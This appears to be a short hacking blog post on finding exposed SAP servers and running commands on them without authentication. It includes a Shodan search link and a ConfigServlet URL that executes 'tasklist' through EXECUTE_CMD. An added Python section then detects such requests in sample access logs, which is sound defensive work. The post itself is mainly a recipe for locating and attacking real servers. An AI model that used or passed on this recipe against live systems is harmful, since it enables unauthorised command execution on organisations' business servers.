SAP is the most popular business application, with more than 180000 customers worldwide.
Companies like Nike, Coca-Cola and Sony work with SAP systems.
In this post, we are going to talk about how we can exploit these weaknesses.
First of all, we need to locate possibly vulnerable SAP servers. As usual, we are going to use Shodan.
http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000
Then, we are going to execute commands on the SAP server through our web browser, without authentication, using the following URL queries.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist
We can see the running processes on the server.
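On the defender's side, requests like the one above leave a recognizable trace in the HTTP access log. The following is an added example, not part of the original post: it scans access-log lines for ConfigServlet requests carrying EXECUTE_CMD, including URL-encoded variants. The log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines; a common-log-style layout is assumed.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2013:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120
192.0.2.44 - - [12/Mar/2013:10:03:17 +0000] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist HTTP/1.1" 200 2048
192.0.2.44 - - [12/Mar/2013:10:03:40 +0000] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig%3BEXECUTE_CMD%3BCMDLINE%3Dtasklist HTTP/1.1" 200 2048
198.51.100.7 - - [12/Mar/2013:10:05:00 +0000] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet HTTP/1.1" 401 312
"""

# client, timestamp, request URI and response status of one log line
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"\S+ (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
SERVLET = "/ctc/servlet/com.sap.ctc.util.configservlet"

def decode(uri, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded requests still match."""
    for _ in range(rounds):
        nxt = unquote(uri)
        if nxt == uri:
            break
        uri = nxt
    return uri

def find_configservlet_hits(log_text):
    """Return one record per request that reached the ConfigServlet path."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        uri = decode(m["uri"])
        if SERVLET not in uri.lower():
            continue
        cmd = re.search(r"cmdline=([^;&]*)", uri, re.IGNORECASE)
        executes = "execute_cmd" in uri.lower()
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
            "execute_cmd": executes, "cmdline": cmd.group(1) if cmd else None,
            # a 2xx answer to EXECUTE_CMD means the server accepted the request
            "alert": executes and m["status"].startswith("2"),
        })
    return hits

if __name__ == "__main__":
    for hit in find_configservlet_hits(SAMPLE_LOG):
        print(hit)
```

Any record with `alert` set deserves incident handling; the 401 record shows what a request to the same servlet looks like once the path requires authentication.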